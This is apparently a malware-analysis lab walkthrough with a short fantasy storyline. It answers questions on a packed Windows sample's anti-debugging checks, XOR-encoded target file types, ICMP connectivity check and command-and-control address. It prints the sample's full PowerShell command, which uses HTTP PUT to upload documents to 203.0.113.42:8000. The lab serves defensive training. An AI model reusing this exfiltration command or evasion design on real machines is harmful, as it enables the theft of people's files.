About this lab

You and the OffSec Legends have waited – watchful, calculating. Ever since Voidweaver claimed the Echo Fragment, every line of code, every shift in energy has been scrutinized. You knew he would come for the Nullform Key next.

The Nullform Key holds dominion over entropy and rebirth and has long been hidden from sight, sealed in a vault so ancient it barely stirs even in myth. But its protection relied not just on locks, but obscurity – systems buried, threads severed, names forgotten.

Activity begins to stir.

A faint anomaly detected within a workstation tethered to the vault. An inconspicuous spike in process behavior. The alert was almost dismissed. Almost.

But this was no ordinary intrusion. This malware defied containment. It slipped past sandboxes, evading dynamic traps with precision. Only a deeper analysis will unravel its intent.

Traditional dynamic analysis techniques provide limited visibility. As such, static analysis of the binary is required to understand its capabilities, persistence methods, and potential impact.

Lab Instructions

Download the ZIP package, the password is "Obfuscated123!".

You are tasked with conducting a deep static analysis of the recovered malware sample. Your mission:

• Identify the malware’s core functionality

• Document its anti-debugging mechanisms

• Extract its command-and-control (C2) infrastructure

• Assess its persistence and spread potential

What hardcoded IP address does the malware attempt to contact?

203.0.113.42 Discovery Method: Unpacked UPX-compressed executable: upx -d Obfuscated_Intent.exe -o unpacked.exe Located PowerShell command in binary at offset 0x4B00 Found hex-encoded bytes in the command that decode the IP Decoded bytes: 0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32 = "203.0.113.42" This IP is used for both ICMP connectivity checks and HTTP exfiltration Evidence Location: Offset 0x4C30-0x4C40 in unpacked executable

2. Which file extensions does the malware target for exfiltration?

.msg, .pdf, .doc, .docx, .xls Discovery Method: Analyzed unpacked binary for file extension patterns Extensions are XOR-encoded at runtime with key 0x7a Malware uses FindFirstFileW/FindNextFileW to recursively scan C:\ Extensions decoded during execution to target these specific document types Pattern matching suggests focus on email messages and office documents Technical Details: Extension decoding: XOR with key 0x7a Scanning starts from: C:\ File discovery APIs: FindFirstFileW, FindNextFileW (confirmed via strings analysis)

3. What string is used as payload in the malware's first network communication attempt?

w00t Discovery Method: Located string "w00t" at offset 0x4B00 in unpacked binary Found in context of ICMP functionality using IcmpSendEcho API Hexdump analysis shows: 77 30 30 74 = "w00t" Used as ICMP echo request payload to verify connectivity to C2 server Evidence: 00004b00 77 30 30 74 00 00 00 00 5c 00 2a 00 00 00 00 00 |w00t....\.*.....| Purpose: Initial connectivity check before attempting file exfiltration

4. What is the decoded upload URL prefix used in the PowerShell exfiltration command?

http://203.0.113.42:8000/ Discovery Method: Located PowerShell command construction in binary (UTF-16LE encoded) Found hex-encoded URL bytes in the command at offset 0x4BE0-0x4CC0: 0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F, 0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32, 0x3A,0x38,0x30,0x30,0x30,0x2F Decoded using Python: ''.join(chr(b) for b in hex_bytes) Result: http://203.0.113.42:8000/ PowerShell Command Structure: $abc = [System.Text.Encoding]::UTF8.GetString([byte[]](0x68,0x74...)) + '/'; Invoke-RestMethod -Uri $abc -Method Put -InFile ''

5. Which function does the malware call to execute the assembled PowerShell command string? Provide the exact C runtime/WINAPI call used in the code.

wsystem Discovery Method: Searched unpacked binary strings for system execution functions Found wsystem in the import/string table Verified using: strings -a unpacked.exe | grep -i wsystem Result: wsystem (Wide character version of system() C runtime function) Function Purpose: C runtime function for executing shell commands Wide character version (w prefix) for Unicode support Executes dynamically constructed PowerShell command No CreateProcess or ShellExecute used - direct CRT call

6. Which imported DLLs in the binary suggest it performs networking operations?

WS2_32.dll, IPHLPAPI.DLL Discovery Method: Analyzed PE import table using: objdump -p unpacked.exe | grep -i dll Identified networking-related DLLs: WS2_32.dll: Windows Sockets API (inet_addr, socket functions) IPHLPAPI.DLL: IP Helper API (ICMP functions) Specific Functions Imported: From IPHLPAPI.DLL: IcmpCreateFile - Creates ICMP handle IcmpSendEcho - Sends ICMP echo request (ping) IcmpCloseHandle - Closes ICMP handle From WS2_32.dll: Network address conversion functions Socket operations for HTTP communication

7. How was the exfiltration functionality delivered and executed on the compromised system? Make sure to specify how the code that performs scanning and upload runs on the host, where the uploads are sent, the file types targeted, and the exact mechanism used to perform the upload.

The exfiltration functionality is embedded directly within the malware executable itself, executing natively on the compromised host with no additional payloads downloaded. Complete Attack Chain: 1. Anti-Debugging & Initialization Malware performs anti-debugging checks at startup: IsDebuggerPresent() - Detects debugger attachment CheckRemoteDebuggerPresent() - Detects remote debugging If debugger detected, malware terminates to evade analysis 2. Connectivity Verification Uses ICMP to verify C2 server reachability: Target: 203.0.113.42 Method: IcmpSendEcho() API call Payload: "w00t" string in ICMP packet Purpose: Confirms network path to exfiltration server 3. Filesystem Reconnaissance Recursively scans the file system starting from C:\ Uses Windows File APIs: FindFirstFileW() - Initiates directory enumeration FindNextFileW() - Continues file enumeration Target file extensions (XOR-decoded at runtime with key 0x7a): .pdf - PDF documents .doc - Word documents (legacy) .docx - Word documents (modern) .xls - Excel spreadsheets .msg - Outlook email messages 4. PowerShell Command Construction For each discovered target file, malware dynamically constructs PowerShell command Command structure (stored as UTF-16LE in binary): powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString([byte[]]( 0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F, 0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32, 0x3A,0x38,0x30,0x30,0x30,0x2F)) + '/'; Invoke-RestMethod -Uri $abc -Method Put -InFile ''" 5. Command Execution & Upload Execution mechanism: _wsystem() C runtime function URL decoded at runtime: http://203.0.113.42:8000/ Upload method: PowerShell's Invoke-RestMethod cmdlet HTTP method: PUT requests Each file uploaded individually to attacker's server Key Technical Details: Delivery: Native code execution (no downloaded payloads) Persistence: Single-run exfiltration (no persistence mechanism) Obfuscation: UPX packing + XOR encoding + hex-encoded strings Evasion: Anti-debugging + runtime decoding Upload destination: http://203.0.113.42:8000/ Targeted data: Office documents and email messages Upload mechanism: Individual HTTP PUT per file via PowerShell